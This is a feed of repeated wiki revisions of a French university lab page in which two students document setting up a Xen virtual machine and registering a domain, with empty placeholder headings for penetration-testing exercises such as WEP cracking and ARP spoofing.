&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute === &lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52757</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52757"/>
				<updated>2020-10-15T09:55:36Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Tests d’intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d’un point d’accès WiFi ====&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52756</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52756"/>
				<updated>2020-10-15T09:55:12Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation VirtualMachine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52755</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52755"/>
				<updated>2020-10-15T09:54:27Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation VirtualMachine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52751</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52751"/>
				<updated>2020-10-15T09:49:28Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Site Web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52750</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52750"/>
				<updated>2020-10-15T09:48:39Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Site Web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de [http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52748</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52748"/>
				<updated>2020-10-15T09:46:40Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation VirtualMachine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52747</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=52747"/>
				<updated>2020-10-15T09:43:54Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation VirtualMachine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	</feed>